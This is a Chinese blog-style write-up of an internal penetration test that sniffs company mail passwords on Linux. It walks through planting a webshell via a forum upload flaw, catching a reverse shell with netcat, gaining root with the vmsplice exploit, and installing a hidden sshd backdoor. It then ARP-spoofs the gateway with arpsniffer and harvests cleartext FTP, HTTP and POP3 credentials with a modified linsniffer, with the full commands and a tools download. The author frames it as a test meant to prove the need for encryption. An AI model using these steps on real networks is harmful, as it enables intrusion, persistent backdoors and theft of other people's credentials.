一次Linux下ARP欺騙嗅探公司郵箱密碼的內部滲透測試
發表時間:2023-07-11 來源:明輝站整理相關軟件相關文章人氣:
[摘要]早就跟相關人員說過郵箱認證smtp和pop協議要做加密, 否則在公司內網, 太容易被人sniffer到明文密碼了, 另外郵箱密碼和bbs公用, bbs也是采用的http協議, 沒有用https, 這...
早就跟相關人員說過郵箱認證smtp和pop協議要做加密, 否則在公司內網, 太容易被人sniffer到明文密碼了, 另外郵箱密碼和bbs公用, bbs也是采用的http協議, 沒有用https, 這些都是問題。 雖然我們控制的網絡部分已經做過處理了, ip和mac地址做了綁定, 即使有人做arp欺騙后, 除非不出網關, 否則欺騙后網絡到達不了網關之外, 因此嗅探明文郵箱密碼已經不可能(由于郵箱服務器不在同一網段)。 但是對于我們一些共用資源的服務器有公網ip和內網ip且處于一個相對風險較高, 而且沒有根據安全級別進行過相應的安全策略的網絡環境內, 因此一些問題是顯而易見的, 但是某些人根本不以為然。 所以我進行了一次簡單的內部滲透測試。
首先我從有公網ip和內網ip的網絡段入手, 如公網ip段是222.222.222.0/255.255.255.255, 內網ip段192.168.0.0/255.255.255.0。
經過踩點發現222.222.222.77(192.168.0.77)上跑了一個老版本的某php的論壇。 經過檢測, 存在上傳漏洞, 利用gif89a文件頭欺騙漏洞上傳webshell。 然后上傳個nst。
如圖1:
WindowsLiveWriter/LinuxARP_B4C8/1.jpg" target=_blank>
利用tools里面的反彈連接:
首先在本地用nc -l -p 5546監聽端口
如圖4:
WindowsLiveWriter/LinuxARP_B4C8/4.jpg" target=_blank>
然后在nst上點Back connect
如圖2:(注意紅色部分)
WindowsLiveWriter/LinuxARP_B4C8/2.jpg" target=_blank>
成功登陸
如圖3:
WindowsLiveWriter/LinuxARP_B4C8/3.jpg" target=_blank>
圖5:
WindowsLiveWriter/LinuxARP_B4C8/5.jpg" target=_blank>
在本地nc的窗口操作:
id
uid=99(nobody) gid=99(nobody) groups=99(nobody)
權限低了點, 可以利用前一段時間linux內核vmsplice本地提升權限漏洞。 先用nst上傳代碼:
如圖6:(注意紅色部分, 上傳成功)
WindowsLiveWriter/LinuxARP_B4C8/6.jpg" target=_blank>
回到nc窗口:
cp in.c /tmp
cd /tmp
ls
in.c
nst_c_bc_c.c
sess_af927ee319af5d5569b61ac520e53fcf
ssh-ZeOfP16753
tunl0
gcc -o in in.c
ls
in
in.c
nst_c_bc_c.c
sess_af927ee319af5d5569b61ac520e53fcf
ssh-ZeOfP16753
tunl0
/tmp/in
bash: no job control in this shell
[root@bbs111 tmp]# id
uid=0(root) gid=0(root) groups=99(nobody)
[root@bbs111 tmp]#
已經是root權限了, 下一步上傳俺修改過的常用的后門, 這個以前寫過 一篇文章介紹如何留后門的, 這里就不敘述了(替換sshd和部分命令, 可隱藏端口、連接、文件、進程等)。
擦擦pp, 進行下一步我們的重點。
我們還是直接用后門sshd登錄。 還是ssh舒服點:)
如圖7:
WindowsLiveWriter/LinuxARP_B4C8/7.jpg" target=_blank>
在SecureCRT下利用rz命令上傳我們用到的arpsniffer.c, 然后編譯:
[root@bbs111 root]# gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet
報錯, 可能是沒裝libnet的緣故, 看說明Make: first you must install "pcap" and "libnet" 確定arpsniffer.c需要先裝pcap和 libnet。
[root@bbs111 root]# rpm -ivh libnet-1.1.2.1-2.1.fc2.rf.i386.rpm
[root@bbs111 root]# wget http://downloads.sourceforge.net/libpcap/libpcap-0.8.1.tar.gz?modtime=1072656000&big_mirror=0
[root@bbs111 root]# tar zxvf libpcap-0.8.1.tar.gz
[root@bbs111 root]# cd libpcap-0.8.1
[root@bbs111 libpcap-0.8.1]# ./configure
[root@bbs111 libpcap-0.8.1]# make
[root@bbs111 libpcap-0.8.1]# make install
準備工作已經ok。 下面重新編譯arpsniffer.c
[root@bbs111 root]# gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet
這次沒報錯, 編譯成功。
[root@bbs111 root]# ./arpsniffer
====================================
============Arp Sniffer=============
==========Write by Paris-Ye=========
===Usage: ./arpsniffer -I [interface] -M [Self IP] -W [Workstation IP] -S [Server IP] -P [port]
===For example:
./arpsniffer -I eth0 -M 192.168.0.6 -W 192.168.0.4 -S 192.168.0.254
下面開始欺騙, 由于是服務器端, 因此我們欺騙網關:(網絡環境如下, 郵件服務器ip:192.168.0.11 網關:192.168.0.1 本機:192.168.0.77)
[root@bbs111 root]# ./arpsniffer -I eth0 -M 192.168.0.77 -W 192.168.0.1 -S 192.168.0.11 -P 110
110
110
Get network cards mac address:
M-> 00:0e:a6:a5:80:4f
W-> 00:0f:e2:23:05:d0
S-> 00:d0:b7:88:07:59
Now Start... .. .
在另一個登錄里面用tcpdump監聽下:
[root@bbs111 root]# tcpdump -i eth0 host 192.168.0.11
發現有數據, 把監聽的數據存在文件里面:
[root@bbs111 root]# tcpdump -i eth0 host 172.16.0.12 -w pop.txt
10分鐘后停止, 在SecureCRT下用sz命令下載pop.txt到本地, 然后用Ethereal分析。 果然發現明文用戶名和密碼。
下面我們就可以用linsniffer監聽我們想要的用戶名和密碼了。
先修改linsniffer.c:根據自己的需求監聽相應的應用密碼。 我的如下:
if(ntohs(tcp->dest)==21) p=1; /* ftp */
if(ntohs(tcp->dest)==22) p=1; /* ssh for comparison added for example only comment out if desired*/
if(ntohs(tcp->dest)==23) p=1; /* telnet */
if(ntohs(tcp->dest)==80) p=1; /* http */
if(ntohs(tcp->dest)==110) p=1; /* pop3 */
if(ntohs(tcp->dest)==513) p=1; /* rlogin */
if(ntohs(tcp->dest)==106) p=1; /* poppasswd */
[root@bbs111 root]# gcc -o linsniffer linsniffer.c
In file included from /usr/include/linux/tcp.h:21,
from linsniffer.c:32:
/usr/include/asm/byteorder.h:6:2: warning: #warning using private kernel header; include <endian.h> instead!
不用管警告, 直接運行編譯后的linsniffer即可。
[root@bbs111 root]# ./linsniffer
用戶名和密碼都自動存到了tcp.log下。 如圖8:
WindowsLiveWriter/LinuxARP_B4C8/8_1.jpg" target=_blank>
經過測試后, 我們把某人的用戶名和密碼發給某人, 相信他再不會想當然的說sniffer不可能了。 下面我們利用我們嗅探到的密碼做個密碼表, 進行新一輪進一步的內網滲透測試。 相信在我們根據滲透測試結果, 進行相關安全技術改造和安全管理規范制度改造后, 我們的網絡的安全性會大大提升。
文中所用工具下載:WindowsLiveWriter/LinuxARP_B4C8/tools.rar">ARP sniffer Tools.rar
上面是電腦上網安全的一些基礎常識,學習了安全知識,幾乎可以讓你免費電腦中毒的煩擾。